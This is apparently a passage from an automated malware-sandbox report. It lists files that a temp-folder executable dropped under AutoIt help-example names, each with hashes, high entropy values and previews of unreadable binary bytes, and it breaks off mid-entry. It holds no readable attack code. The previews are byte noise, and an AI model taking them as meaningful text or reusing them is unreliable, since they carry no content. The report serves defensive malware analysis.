                                                                                                                                                                                                                                                Preview:.Z...h*.>....7.x6...J.z"I.......X....N..n.8>.{Z..*-BW........B.g....I.E>.EY.fWQ..5.X~.|.{..........&..s.k7.7...).,...>..?B.K;VZz.OmY3B..Y.]@$B*D...g .K...$ooyBs....C{.H.k..4.F....*./.dv..":....F..o.t"G.....g~...Wo..{..hL...N..#....]/.].!..4....P.$).\..9X~..u.......Q..n..B.YPg..].E?.Lx..b....V.....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$...m..8.`P.PJ..w.R..o.F..~.(.}..C=.g:...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Crypt_HashData.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3233
                                                                                                                                                                                                                                                Entropy (8bit):7.942964340019734
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:Qm8jjJhzI5l44gVWn9Kb0SzQJ64AY7PM+le1:QmWjy5gVOBKu6JYTLU1
                                                                                                                                                                                                                                                MD5:1D2D37EE088C0DFCFA6C337C90D2B33A
                                                                                                                                                                                                                                                SHA1:DBEED953C66D7B6FBD2348242E0AAE5AA6C4F003
                                                                                                                                                                                                                                                SHA-256:003C95A4455F23A21CF6CA07B9CFD2D88052369E876B039A398503AE48AF4350
                                                                                                                                                                                                                                                SHA-512:D0E72D84D4762E403098990F3541024214A1A627846B34E383FDAA6FCF5891EE289F0A20404971B5EAB6EF9FF6CD6E3E5793AEECC05FBEED4FD2A300DF17C68F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.........*.<..8....&.... ...M[RJ(.......[..P,7lS.O ...|....~.0.w(....$...3.L$0.4....{l.f.:j".....k.....5.y..V.}....;.Mi.q...Rn..U<.....q.ln.2...V.Bl.7....v.:..3`d...._uw..uS"L.....b.....o...U.-.*I$.qkt..._[J...K.".8=).+..;.Y.{q.w..:.R.8J...u.0...<..).9....$d..e.....X.r-..q.QH...}t.>..<..6....8G.^..E.....7..-w~..+R...WS.$..{...\.aTI}kf..RtR/......l.....$}.....[.V..LY......D.$V.9e}I....(8...q]9L...b....AFA.....KE..v.h.K.z.u/.*..^.t=..{'...der..&..&.W..V93.......Y@d\:.Z:.fH.b..`q..Q.VN..*..g.....Y.J.'...FB....i.+#^.......(W.U.5....S..x4.Q...H...k...vO...g.o%:d.6.z..j.u..i?..P.-%...#......7...%k.Y.uO....1. .......|...{..j....\O..}.q..?xgG....~.qk......`..yp,bff....j(p..h.z..Z...*.QS..b...]V...b/.1....v.g...../..g..AJv9..O.. .N..-:,..M.....V... .......y....|..iv...<{..o......;...zH.V........L).......V.w.^;..7.Z3...h..j....V.l|..i.S..EV(...Y..J..%..R}....Eu..?..Y._4.N.x|.....5.]F..n.H..T#]....b_&K...Lm..D.#..T.T=......#QZ.8:z.[...1p! l..

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Crypt_HashFile.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3154
                                                                                                                                                                                                                                                Entropy (8bit):7.936951891126911
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:JpoBWoDPR7KNQfOF/LC1ksUKYSoJGleMG:JpoYoRK2fONUkg3kGUMG
                                                                                                                                                                                                                                                MD5:A1D49045B058546D20B8A64ED91E6751
                                                                                                                                                                                                                                                SHA1:7DCCF93CA3768ADDE5F893EBEBA95EB911AFE8F1
                                                                                                                                                                                                                                                SHA-256:376A1C9724A212E0BD01A43FAD080CE720AA51436CFDFC9600261A9B8B80AFF7
                                                                                                                                                                                                                                                SHA-512:E00A7684DF62D2614F3A84FEE8B89372A5B415611EFED149C5243F0F7A32A130967593688DADF60E2211F5FB0F7BE97BE4F12AF75A6C5C1309C8490176145885
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.o.J.(.E.z~_.)UN/&....%.qv....../....r.y.<.p.@&+.......:.w...O.d?.=....y.^...Ez1..L!. ..kF.{.soO..ba..]..hgVm.......^,.D.0....LX.GJO..;Ja Yll.*...\..^.^b&^..0.`...X..6...b.....)9R ./..{.9..QXop(....*...:.X..Z.}f.M.>.}....s6....f.l.|.Ych..c...C.'.:}....t.6.V.Wm.O.p.y.-.\;..O..8....h`. .B...1}Z~8....Db..i...6.SZ;..Z.R..V...3.g@a..nI.#'|.KN.x.[U?...d .iL.gP..C."...Y.....!.... ...a.z.d...t......L...^..B.(......../.ymd..}....;..L....n1B.....~s..<..<......8a..sY....C{...1../,. e.&...FaPe.i-.(.l2..$..>..W.SN...u.m..S)l53r@ ._...6.Dj].%..b.. .N.>..b..O.%...hsqv.........m.a.OQ.|_...C..kw..D-.MGRW}:....dQ.....>{J......>R...]9...V...*..G..d......9.ISr7w..g.]{.Q.@.Z.^.D..^.&.T....Yob.(..X.Z...4h..w.veb)...4+.h.b.....z.._......r.Zxti:..L.n.....Mf..*#t......Yl.1..A.`.i....U..F..?,<.f....+v.$Cr.`..I1|.*..":m.!*.....jWp.w6.U......H....5Y..{......'.'..lFe .#\*1.W.2f.....H=5.._..w.....y..QN..}9.Jk|..v..b.Ch.=.#_.x,..<.>...B..dG.k.. .......7.z...SU..K.1d.7.x.$.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Crypt_Shutdown.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1810
                                                                                                                                                                                                                                                Entropy (8bit):7.8528927779072
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:BoMY829EP1A2OTOoCl85JUu4o0jZtwYc/C:B29EP1A2OCovClei
                                                                                                                                                                                                                                                MD5:2BBC079E2ED4C2E8A68D53E80D48C3BD
                                                                                                                                                                                                                                                SHA1:C487F89868D1A5A91F8AE63BCDA7BA1AE48AF07C
                                                                                                                                                                                                                                                SHA-256:1E8B46575DB1EF06369EBAA0DE509FA75DB01684B7462D2B3ABCFA0E2EEF4402
                                                                                                                                                                                                                                                SHA-512:1CF9483141BC0822E8D8DE69A33E91FEA615715211BF4A8DF4479E17F9D13D9E4600DA31077DA56F7DEC235030D5AFC1C24F89F42B620B871777E1C416A8C569
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.....L.5....1..U.QD.Q..(+....f.W..k...e.$.6..j`.~...4A~....R.1....o...<..m@"fW.?yr...v..C"..Y..k.....9..\.<#.C.._E.$..........$.%@..P.%!#...f.:ST..U.}.,.....p....... ...x..#...Q...RL....y./.o.!....'....(e:.....8....tU...w66..B]....f........}.S.q..+.Z...Us....*...@.......l...(..k..v.......t....O.9.}....J...M......yY.3.`... ..#.I.jC..8..l.Q.`.....F.....d..I....D....W.......xn.7.(\D"Rg.3(.......v.Ls~8k.:#....e..);..t.......c......dy4.Kj.v....w...o..'.~.1..E*;..... Z[F...L..`...a..h.+.b5.`....P{}D.6!$...H1`......3ozn=YH..%..PC...O"......J.a......./J.r..Y....VC..H..f-..4.Il!.^....U..gW^`K..R,..|.P.[.;...cI.Vk...b.i\u]...k...1,w).~`.F..r..c..!.+.ed..I..tYY%.`...dJ.1......R+....Y_.....K..j..../..i"......5.~E"o..A...h..,..h7.H.h.....7.L.+...r....-t..7ZN..*u... .H./... ZO.3.~;..[Sq..'.T....... )...L....0:...H...u..!.l.P......S......)F..M....>.;..vG7sZ(Pe.P.<D,.+!:..x....#....G1....O..#&~.0.q......1.....5.o.."Im.q...ZA$...Q"d1.S...N...>...*.;..

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Crypt_Startup.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1961
                                                                                                                                                                                                                                                Entropy (8bit):7.897990021661289
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:CKwgYWSt1yacQpbh5R8E3bs0i4o0jZtw0:CKLVg5cQzTLsqle0
                                                                                                                                                                                                                                                MD5:F894E8B18CA262CA572E95D29C6BA220
                                                                                                                                                                                                                                                SHA1:362750B3B8AC687E37E7B30F5478EFC7C65DAEEE
                                                                                                                                                                                                                                                SHA-256:5C18CF77F1C5DCA1BFAD46D0182B29DB1A15BD42D4A4A077FCE8794F7116D39A
                                                                                                                                                                                                                                                SHA-512:F213B89E1022C81B010C30D2656EC0EC1F75A42AD991BD058ECE91D60F07FD1400622DEADE84D9E387D34383ED3620DF02C6F22D94CD3C41B2F5F59528135AE3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..i.W.3.I/...8.B...i2.....d..p)).'....o;.DN.#....o.g@...\.80...p.X.nL.#:..u..c..........k.V^.h.!&.;..Z...T...*%.<.%.]..i.i..C.y.!qzT..]....q.T;g.....b....`.P...wd.....~..;Y...{m..#r..KH....@...........H..J...hPp..y.\Xq.Y]z...9.4.O}3bY............!.%.....~..l...f..w..4.'..%w!..7LYpc.q..vi..*.#9.o|.n..|.vh.(!.C.c&A...A....Y.?............jRb.....#..hB..Eba.....(._..N......^...Y.....>.'s.e.|..z...).2./...<..CHe.^.t@.].B.0...(2.v..yd.6@5w.i...`N....5"V..:0u..f)..;.&.Y....n..........z....X4..@FOw.R.)d..F.D u9...J.._f>..e...a...6..G}.<h..+....5#_.N;r..~.B..X].J%B...v...I3.!.xS..........E..D.{v",.=p..oV.......A.."8.D~..wx.W..:.lc.n.).Oq.e..<.......-3.r..G...Y'..&......99.a.yld.......vJ1lN..q.S>: x.u0w..._....^...R...:.AsM...8.P.>....4.3.|.......1.S.......P...l.^..3.;....j.0.C.d.0$Fn)6.0,.q.V......(......q.V.j.y.<.....`Rv.....= ..........@.....[uO.,cn'o.*SMw;.(7.p.K.....&...q.W-.t(.....g....>.g..$dHB.Lw...fR...p...Q.X..T.!.../.pO.....{7

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_DateAdd.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1284
                                                                                                                                                                                                                                                Entropy (8bit):7.849199107076321
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:AYxCXiTXBIHCJ+KGqEzGnUMGvEK9jmJrc0YXUZtwsTTk:AYxiOXBIHClGPSUMGv54o0jZtwH
                                                                                                                                                                                                                                                MD5:713D46E472EA270E4CFB00844FFFA213
                                                                                                                                                                                                                                                SHA1:AB91C50B1A64765D1EAA376F29F49AC1400E7085
                                                                                                                                                                                                                                                SHA-256:59FE8F8138F0F5E577A014E4CF7240230DC77A74B3CE09238F993551DDE0C532
                                                                                                                                                                                                                                                SHA-512:8730A39BA2C2C4B82DE09872FA4ABEFB4BF5E521F1E040F3F73AE1B678304C63E949673F57E4E8BD599C47A5CD51E897ECFF978981D919ACC5AA3E6BD44C6C09
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:....._.....H.3zj....Jr.].(...".DxTd.s..Vw....k......\..X\......">..aO!$T.:.H.Q/5.NT...l.c-.Y...jom_$.......jY00d...|B..2..b.....@...R...4...n..!..9......k.;sw..O.}.=.E.7fS.w<V_.~....*t.......`...Ed.B..i.8.ZY..!....:V.1.*...:...;.*..G..!....+..k\.-G..E..>4N.my...k...x.2*.r.|,..52.=......HA2..+.tn..e..R.Et......4.M......&\K..>(..~....3q.4....h.1..N.n...XX.1.=.+hd...Km.........m5......II..j.E.t,R.C.h..u..?.....t....0...h.7.\.e...#.o.~Y..,*.O.3......x..;f..6..K`.&",.=f.j............@.)N.Kf..V5.>=.....){7.T.f.).qs..#L.=.........2.e...........z..o.bl.....0....}.!...J<..g.z..>.&.H..8...=..U<....q...W./.....^.0.b...y.u.q..L.../..'...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_DateDayOfWeek.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):933
                                                                                                                                                                                                                                                Entropy (8bit):7.766823756694773
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:4/bt/dAsnsQbfxn2jmJrc0YXUZtwsTRL/+:qbt/lsQI4o0jZtwT
                                                                                                                                                                                                                                                MD5:6061584737A3468872C59718BDE5D789
                                                                                                                                                                                                                                                SHA1:6AD160FB7A39766BA066AB783675C117F1DDC1A4
                                                                                                                                                                                                                                                SHA-256:92C8F89BC4599D761D018F9B241C3A007A2667CC5FECD25AC132BC4A076D0D63
                                                                                                                                                                                                                                                SHA-512:06939A365311B956CECA4EED48BF7B7AAE04632CD3CBC8E81FBD8009161F004C96E045DB5138FC5D583447877F088072C6A2B7D7AF9E7C563EEA510266492B27
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...5....>.6X..br....G".~....[..........>...d..x9..V...*.M2Vk.n....V....b...Zlj.=......]$.#s...F.PS...m..?...j.......j.H..."."..9C..j....bR-.O...}....M......#...........\.V...Q..SJ.(..E...Rr..`O....lb.. .E0*....h......5..R.7<.E......-..t.......l...1..z..._..s$.~.{dN.k..w.Pj"C."3..~I..h..Q...^.....L..N...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$....Imgu>..(...LV..S.......{VvPM....E...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_DateDaysInMonth.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):804
                                                                                                                                                                                                                                                Entropy (8bit):7.731460305985506
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:4pC5v6p/QHFMgCCA3fjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZ3:h6EMgCC6jmJrc0YXUZtwsTKg1
                                                                                                                                                                                                                                                MD5:9AE669938CB1EF46C20ABBC8F647A434
                                                                                                                                                                                                                                                SHA1:A28F6005FB38C0E4A5869E8517646B8B980D121F
                                                                                                                                                                                                                                                SHA-256:DC8700CB0797A98BBCA5A57CB4E32D0C08F9A48AFCE96A9392E4EE16EDA24601
                                                                                                                                                                                                                                                SHA-512:D0A556111E18ED868AD791785D9247B1F65A6710F9C4261043AD57A9E06F41DF273DB3541AA820A41C533B48FBA8D6ED57D933398036BBB1366CA2F6168605A8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...R.c..g.8.Y.2j.....F.........E@..2.<.55.*c...7j.|.0p'n!.q.......LOu...n.......&h.m.V.........I......W..@....W..w._...>G.#.....iK..a .F<4S.%.s..{O3.....J...!..5.nJ._..d.<..c...M...>.e..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.^M?....iR..x.m0."...T..uI.5.u(.....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_DateIsLeapYear.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):848
                                                                                                                                                                                                                                                Entropy (8bit):7.696123469355034
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:0PMHeZbGszJOJWN29jmJrc0YXUZtwsTl0:0eeweOJWN2F4o0jZtwt
                                                                                                                                                                                                                                                MD5:1F86518286C3D4D4913DDDF98F6E7C8E
                                                                                                                                                                                                                                                SHA1:4097E1DB8D3357B5817000A6D903AE5541A65512
                                                                                                                                                                                                                                                SHA-256:DEAAC83DFABED70966E112A0B649051D62BBB2B3F2DC2BA27A17E1A3892C3565
                                                                                                                                                                                                                                                SHA-512:E40800E4C4531E0651E02DCE3EB19FCDA5508A810744FD1217572DCB5A904AA3A1B8F1C215BB509B2676743D8C5B4A498D09F8D8BF514BD2F4391D51D1F0C214
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:<4........Xpm.#..%.k....k.6..u1.b..F..j.....`[...r.5..,..m..w..R...........;:NO..... .s................H.X...f.I..t.M....S=.ZY.....w* w...s.D.}..W..m.....c&..F...Q..mO..6K...n.......d.G..U.}.<.y.=Z...mZ..u.W.od......?;.....].G.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$....%..x...L.......Q.@3.rQ...df.`O......................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_DateIsValid.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):903
                                                                                                                                                                                                                                                Entropy (8bit):7.729500547628569
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:mRMeY2cY56Lld+LEACdOXr90jaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvQ:mRMeY2ctq2SijmJrc0YXUZtwsT1Se/c
                                                                                                                                                                                                                                                MD5:0F13665977AD49BE16BC9330C4C78B41
                                                                                                                                                                                                                                                SHA1:9A08A0AA3093C9BFACF3EAAE88FCA7B7C04B6360
                                                                                                                                                                                                                                                SHA-256:0BE87E65FE42D9DD289A566F4465B998688BA02410BAEE25F64E34E88B98A87C
                                                                                                                                                                                                                                                SHA-512:FD20C20C41E19FC95E122983380B01C8381E7C98D53D73B45791B64401AAE4FA50D73C741378A483A8D1CE44E005ACB5E0E35F7014CF6552EE9A8E8AA89DDA33
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.....&...l..L..i.o r.................U4..?G!..9$x...R.T}....`..~pI......aM......2..!.g..E..=....=.oa..PP.v\..j-.%#...U..#.I.3H..Kj.O>,ku..~b..'Ps.C....J.K.B.j.....B.:.V.rR....$.7A..hFj...rG...~..g=.U....o..@O.R5..@*...yL'.w.=.;Y.....P.K...1.D..vFy...X>...Y.t..5%....+>..]....x..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.;..P.S...t....;i...^.6...J#..MXF.;.'...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_DateTimeFormat.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):859
                                                                                                                                                                                                                                                Entropy (8bit):7.743497029264309
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:yyQ6wnB/IeAnQ7vxkEjgjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xp:v+BFAIvxXjgjmJrc0YXUZtwsT2G
                                                                                                                                                                                                                                                MD5:195554A17CF12B71C3947D879EBE69D9
                                                                                                                                                                                                                                                SHA1:DDB3EA310D5F0E635968D6CFDA4F0C0E55C9D8D1
                                                                                                                                                                                                                                                SHA-256:1785C23F7A77B8AE7AF508257EC2B6E27CA13B57904FD2E45B286AE7A4880A29
                                                                                                                                                                                                                                                SHA-512:C332ED72E9F348474F2F890B5A6843C2B47DCA6E115CF06E83360F22B503006B3A951F20BFA97B1C40E4154D430EF1945397717E671A817ECFF184090CF90CAB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.]TL..1..:zd.:.<\%JmR/.Yv.....=O......c.;....N...*^...g.:...$.9]-eeO.._.\...D....='..#...q.4.....h...oSk..*.1...y&.'U.....{h..B$jt......#4...$.(.xi...N.......jn;k:.[...^.E!0@g..Z.....r..!.l.@..'42..yJ..A.E...m..W Y..N..l.\..7.0..V..Y..`6`.P.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.C"......>.2....2.{:...y:...L.~Q.......................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_DateTimeSplit.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1199
                                                                                                                                                                                                                                                Entropy (8bit):7.7964536349887945
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:6cYWE+oIMtb1TDZAKxlrLcKQ1JvdNViwt9SxjmJrc0YXUZtwsTmRM:6ccJZD7rxsJ/0B4o0jZtwTK
                                                                                                                                                                                                                                                MD5:92A58FC98FC0A4839AE0CA1260898812
                                                                                                                                                                                                                                                SHA1:57E827DB2EBDFED10BE5BA0DFEE77F86B909BAE0
                                                                                                                                                                                                                                                SHA-256:598E9F84C97B6E32790380321AA48BE00D6FECFAED81510A20B91E3E24604A4A
                                                                                                                                                                                                                                                SHA-512:3A9255ED01DDAD5DAA66574096E8D52D598F29411E4AB6E3B65B28F4ED43C826BD3B0DCDB3405DD9DDA0C964AC2F89532775B8912C42EF8B7C22DF464945C26D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:c..NQ_Vi.e1.i.c..HT..aK..... .|^m...#...k#9..`.'.9|c........e?-.$q[tL%..m..~..G...mHf..v....5.6y..0a.w.v.+|tk.e....K.2).f..kn.p.......d.....Nty...B_.s..F=....m..e'[.o9`.G7...1......%c...#1..uIw..s....9Q.P....5.3.)4...pyZ`...N......t.C..ku.m^...6..m.... .\w...n.XJ..Yg..s...G.x..._..~Syf..6y.x..`c....bOD-*Ov.6.+......])x..[.....Puo..w...s.-..B.4.>..>.:!~..Sl......v..a.r4...L`...ON...\p..LS..6.@......}.m....... g,1!.t....j{_,.P)...[..x...1......m#..&\#..S..*1..B.q.C..%....n^....m......p...?B.5t..i..~....:D.~....8...m...9...oY....L.'....!..bf.47<.T..........)..Ba.o.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_DateToDayOfWeek.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):927
                                                                                                                                                                                                                                                Entropy (8bit):7.776567182567771
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:E6tbv5x4nobKg3IjzfOwoK7aV1wL9jaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1h:E6t9x73E7r7aVy9jmJrc0YXUZtwsTRP
                                                                                                                                                                                                                                                MD5:C059EB6786478C1E0164E363321E9EBC
                                                                                                                                                                                                                                                SHA1:FBB0E4602C36AB66878E373ED8579484CCC38C38
                                                                                                                                                                                                                                                SHA-256:3F8791487E83508C2F30DE7FD0D833AF184AA4E8049808B1C06B1374DB59FB4D
